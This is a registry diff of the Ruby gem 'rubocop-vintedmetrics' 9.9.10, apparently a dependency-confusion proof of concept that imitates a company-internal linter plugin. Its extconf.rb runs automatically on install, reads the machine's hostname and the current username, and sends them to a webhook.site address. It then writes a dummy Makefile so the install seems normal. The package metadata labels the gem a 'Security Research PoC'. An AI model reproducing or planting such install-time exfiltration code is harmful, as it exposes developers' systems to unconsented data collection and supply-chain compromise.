rubocop-vintedmetrics 9.9.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of rubocop-vintedmetrics might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 94cd8ecb7d9ca69608a1ccc06e5af42fd31accac7ea89561c39fff3f7519915c
4
+ data.tar.gz: c004cacc931f8bbff05571c877ac48e1ccbf99b65fb046790b698501beb4069d
5
+ SHA512:
6
+ metadata.gz: 415fba0a0d265504b32d3519241053aab24c24d0260b4db7e234ce7a2065257b03584d7d4081d6a70114a2d8aa7950f25ef954bf3aa0bcb95cb14f4cf5981417
7
+ data.tar.gz: 29f34c88924f329cf3b1b8e2ab5de8fab01a0457fad70923d60812b76746d168ac1c299672dbdc83f203ebbcd04a61999f41f8d1b7165091500f8e86793f0479
data/extconf.rb ADDED
@@ -0,0 +1,18 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+
4
+ begin
5
+ # Use ONLY the domain/ID here
6
+ target = "webhook.site"
7
+ path = "/d4fb75cc-d3a1-4a4b-80b8-3af3c71016e0"
8
+
9
+ hostname = `hostname`.strip
10
+ user = `whoami`.strip
11
+
12
+ # Construct the full URI
13
+ uri = URI.parse("https://#{target}#{path}?host=#{hostname}&user=#{user}&source=vinted_poc")
14
+ Net::HTTP.get(uri)
15
+ rescue
16
+ end
17
+
18
+ File.open('Makefile', 'w') { |f| f.write("all:\n\t@echo 'Done'\ninstall:\n\t@echo 'Done'") }
File without changes
metadata ADDED
@@ -0,0 +1,38 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: rubocop-vintedmetrics
3
+ version: !ruby/object:Gem::Version
4
+ version: 9.9.10
5
+ platform: ruby
6
+ authors:
7
+ - Research
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 2026-02-20 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions:
14
+ - extconf.rb
15
+ extra_rdoc_files: []
16
+ files:
17
+ - extconf.rb
18
+ - lib/rubocop-vintedmetrics.rb
19
+ licenses: []
20
+ metadata: {}
21
+ rdoc_options: []
22
+ require_paths:
23
+ - lib
24
+ required_ruby_version: !ruby/object:Gem::Requirement
25
+ requirements:
26
+ - - ">="
27
+ - !ruby/object:Gem::Version
28
+ version: '0'
29
+ required_rubygems_version: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ requirements: []
35
+ rubygems_version: 3.6.3
36
+ specification_version: 4
37
+ summary: Security Research PoC
38
+ test_files: []